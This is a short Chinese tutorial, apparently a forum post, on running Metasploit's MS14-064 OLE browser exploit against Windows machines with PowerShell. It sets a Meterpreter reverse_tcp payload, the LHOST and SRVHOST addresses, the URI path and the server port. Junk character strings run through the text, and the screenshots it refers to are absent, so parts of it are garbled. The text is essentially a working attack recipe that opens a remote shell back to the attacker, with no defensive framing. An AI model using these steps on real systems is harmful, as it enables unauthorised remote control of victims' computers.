$ ^9 M! E2 `3 C. M1 g
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示# D' {6 B+ @) E
9 q0 w# ^/ d" j6 \
$ P x1 S/ C1 _+ T; C/ f1 T/ L
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
+ ~, ~; Z8 h, I+ q3 {
1 ]2 ?/ o" P7 ~0 K7 P; O0 G: n( ]) V" M, |: U, M5 A/ J3 V
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp# v% Q3 ^" n+ J9 \9 l/ q* R* t
7 a0 r0 G! p3 s! P1 ?% r) w, ~% D, r6 O" {+ e1 p: Z
set AllowPowershellPrompt true
+ y& E( b0 i: o
; b k# v z0 S! q+ ~7 ]
2 r' Y5 E1 S& B1 F: i! `
Set LHOST 192.168.0.109& w. s8 \, _) B# x
9 q- i% [6 P/ Y0 R: K
+ i% ~3 h' {, _, T set SRVHOST 192.168.0.109
4 @# |4 y) C$ _* {, ~& t) V
2 L: ^% ~6 E! p- j0 `3 ?
2 c/ i( e# H2 @
Set uripath share
1 A: V8 B( |) ^: ?8 x
6 M: X! ?1 {% V3 B- r: w" h- \7 k
Set srvport 804 @) @: S B6 w3 g: V( M5 U/ b+ \! d
4 Q' D' b) G8 X( T. v' v4 T. Y9 G
3 \$ H, B7 n1 \6 q0 w; W! |' A / O" l! k) _5 y2 I7 V
: O! X# H4 i, N* t9 D n
* K* R4 w9 s- j# e- X: w: ] * h7 V3 ^* P6 N
) {0 g" z, t4 z$ w9 f* @
9 c1 `1 ~# l% H% f" a 7 u+ d7 W) I( Y# Q1 l
, p! q* u$ ?% J- f. W* Y2 b
# q# f9 A& y5 @" v 1 N; @% h3 X( p
% w9 M4 \: U. ~, r T
" C( H; F {0 x2 O6 v
. Y( \3 R& d3 W
) |9 k/ U+ J( ~
& X7 Z; X. N. t4 |* e1 z& a, b 下面我们来访问本地地址如图:
7 c* s7 J( x5 y1 b0 M; p$ G1 Q
" Y) f c7 y1 d+ _6 r9 c
' u2 x/ f* M+ Q D! E3 a1 E$ ]
, c8 K' _4 D2 `4 k8 U: |* H/ N6 o
0 m, M, U% ~3 T0 H6 L
4 [; _: y T/ d: F+ g& b! k , _. \' T. k; B, g4 A
- b% s, S9 W3 B& R8 V
, x u+ A7 \* t , f% B( U$ K6 B% ~; |